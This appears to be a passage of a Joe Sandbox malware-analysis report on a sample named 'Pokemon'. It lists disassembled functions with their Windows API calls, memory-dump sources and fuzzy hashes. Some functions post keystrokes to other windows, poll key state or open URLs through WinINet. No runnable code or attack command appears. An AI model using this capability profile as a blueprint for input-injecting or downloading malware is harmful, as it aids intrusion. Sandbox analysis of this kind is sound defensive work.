                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 761b01275feaa31fa9cd5baadf94ec0970e61506e0dc60a9e2a8ae1e7e1a1645
                                                                                                                                                                                                                                                                                      • Instruction ID: 0522a320dc0bf7d46281572dcf3da52abd6ade1bf86a267237a3b25c46169072
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 761b01275feaa31fa9cd5baadf94ec0970e61506e0dc60a9e2a8ae1e7e1a1645
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651AF30A40A29BFEF349F64EC89BD83B67EB04764F244111F514AA2E1D776A9B0DB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000D28D1
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000D28EA
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000D28FA
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000D2912
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000D2933
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000911F5,00000000,00000000,00000000,000000FF,00000000), ref: 000D2942
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000D295F
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000911F5,00000000,00000000,00000000,000000FF,00000000), ref: 000D296E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9dbeb45f58b94d30ace87bc1903b708d6e76eec9ff9162b36bd41ea6d04c9551
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c5cb359ae120c63b9cf9334c2d5a538e57bf0dc581288edc456934ed347f933
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbeb45f58b94d30ace87bc1903b708d6e76eec9ff9162b36bd41ea6d04c9551
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51883060030AAFDF24CF24CC45BAA7BF5EB58724F104529F952976A0DB70E991EB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010CBC7
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010CBDA
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0010CBEE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010CCB7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: GetLastError.KERNEL32 ref: 0010CD67
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: SetEvent.KERNEL32(?), ref: 0010CD7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: InternetCloseHandle.WININET(00000000), ref: 0010CD86
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 40cc16e87fd894ba02fb101918b67354dd2cdae09bb39ff45ebda62da2cc4b90
                                                                                                                                                                                                                                                                                      • Instruction ID: 952858c8ac240280067b3f3d45561b246be3352e98ce5cf13bdac6c029815470
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40cc16e87fd894ba02fb101918b67354dd2cdae09bb39ff45ebda62da2cc4b90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7319E71500701BFEB258FB1DE44A6BBBF8FF08314B14462DF99A82650C771E855AFA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F0A
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000F2F28
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000F2F2C
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F36
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000F2F4E
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 000F2F52
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F5C
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000F2F70
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 000F2F74
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,000F1D95,?,?,00000000), ref: 000F2159
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F2160
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1D95,?,?,00000000), ref: 000F2175
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,000F1D95,?,?,00000000), ref: 000F217D
                                                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F2180
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1D95,?,?,00000000), ref: 000F2190
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(000F1D95,00000000,?,000F1D95,?,?,00000000), ref: 000F2198
                                                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F219B
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,000F21C1,00000000,00000000,00000000), ref: 000F21B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001243C1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001243D6
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001243F0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00124435
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00124462
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00124490
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FC6C4
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 000FC6E4
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 000FC71A
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00A85C18), ref: 000FC76B
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(00A85C18,?,00000001,00000030), ref: 000FC793
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                      • String ID: $'$$'
                                                                                                                                                                                                                                                                                      • API String ID: 4210589936-36325786
                                                                                                                                                                                                                                                                                      • Opcode ID: dd10b0c7f39f01f3fee59803d09c5035751a1c6c15ba7f77fd126882ca22262f
                                                                                                                                                                                                                                                                                      • Instruction ID: 661857bbd718646a98d4a160f816ee41e879f6401e67c0aca20d44c500fb976b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd10b0c7f39f01f3fee59803d09c5035751a1c6c15ba7f77fd126882ca22262f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1415E75A0421BFFDF159F64D844BEEB7B4FB05324F20821AE429A2290C7346E94DB62
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 000FD1BE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                      • Opcode ID: 353bc597ba045e4803603b41f226064140e82acfa9761fbd653c8912e020fb56
                                                                                                                                                                                                                                                                                      • Instruction ID: 72abd60073032055fdd674b089ff40c02269842fd4fa124e25fe577b51558cb9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353bc597ba045e4803603b41f226064140e82acfa9761fbd653c8912e020fb56
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C211B73534830EBAEB156B54FC82DFE77DDAF09761B20002BFE04AA5C2E7B46B405160
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                      • Opcode ID: 2ca486353968ec5a76c3fee476f98f75bdacc25f5010710bf28f92cb29e156b6
                                                                                                                                                                                                                                                                                      • Instruction ID: 43a87e602745a4323093a1444f6746dd7506b681b022b15823455ab80c2a141a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ca486353968ec5a76c3fee476f98f75bdacc25f5010710bf28f92cb29e156b6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D11D631908219BFDB747774EC4AEEE77ACEF01714F1000B5F605A64A2EF749A869690
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 02e9f51e6c5789ad1ddbf894441e6f75039c670a7cc92b6cdd192a11c0f9b156
                                                                                                                                                                                                                                                                                      • Instruction ID: af0ca3da22d88d9faed66a7d08e95ff9cd60f1620967049b9b12a983ffa2dec8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e9f51e6c5789ad1ddbf894441e6f75039c670a7cc92b6cdd192a11c0f9b156
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5418365C11219B5CB51FBB8CC8AAEFF7A8AF05710F508472E618E3122FB34D255C3A6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000AFC41
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000EFC15
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000EFC98
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 17e2f55d965a32f3e57c139e4103d5230a3a3576adb5aa17ca6a21b18f05c65d
                                                                                                                                                                                                                                                                                      • Instruction ID: ad0c7b67a1c93e28d37d73e52fda7fb5b51a8a5bca24e1fdb700edac38206d51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17e2f55d965a32f3e57c139e4103d5230a3a3576adb5aa17ca6a21b18f05c65d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D24109306087CAAEC7789BFBDB8C77A7BD1AB47360F34453CE94656960C675A880CB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001237B7
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 001237BF
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001237CA
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001237D6
                                                                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00123812
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00123823
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00126504,?,?,000000FF,00000000,?,000000FF,?), ref: 0012385E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0012387D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c705613e712f164d79a1a65fc5a24b87258ba346476f16fab74b97f97a22b758
                                                                                                                                                                                                                                                                                      • Instruction ID: 33bb7fa40726fed15e97604096d9bb43479c40900e7c655d8c76a8016148fedc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c705613e712f164d79a1a65fc5a24b87258ba346476f16fab74b97f97a22b758
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A31A072201224BFEB254F50EC89FEB3BADEF49715F044065FE089A191C6B99CA1C7A4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                      • Opcode ID: 6dd3299cca1a1f3606d6b3aa0569204062475e31aa2789877ba6e17191868118
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f542cc5dda5a7311c8964513609a7044629c4c47c68d226cc40c7d66e93a710
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dd3299cca1a1f3606d6b3aa0569204062475e31aa2789877ba6e17191868118
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76D19071A0060ADFDF18CF98D885AEEB7B6EF88304F148479E915AB281D770DD85CB50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000D194E
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D19D1
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000D1B7B,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1A64
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1AF7
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000D1B22
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000D1B2E
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b0e2e659fbb4462af7b45a3c4203e92803cf89470fe956e095f528b3b46adf3
                                                                                                                                                                                                                                                                                      • Instruction ID: 953b7935d68374d589cfd3b1ebaf5b2202e5f945ce8ebcb0aec93d69df070daf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b0e2e659fbb4462af7b45a3c4203e92803cf89470fe956e095f528b3b46adf3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF917072E00316BADB208EA4C8A1AEEBBE5AF09720F18455BE915E7341EF35DD458770
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                      • Opcode ID: 767f7e2eac6c4952e1f067901d2a46d386852b0301209047dc2c35b84d0b7cb9
                                                                                                                                                                                                                                                                                      • Instruction ID: 91fbc7e65a40904b0ef02bfa4f5694296f6f9f3734c88250b1b469e302a4ceaf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 767f7e2eac6c4952e1f067901d2a46d386852b0301209047dc2c35b84d0b7cb9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50918E71A00615EFDF28CFA4C884FEEBBB9AF85714F108529F515AB280D7709985CFA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00101C1B
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101C43
                                                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00101C67
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101C97
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101D1E
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101D83
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101DEF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
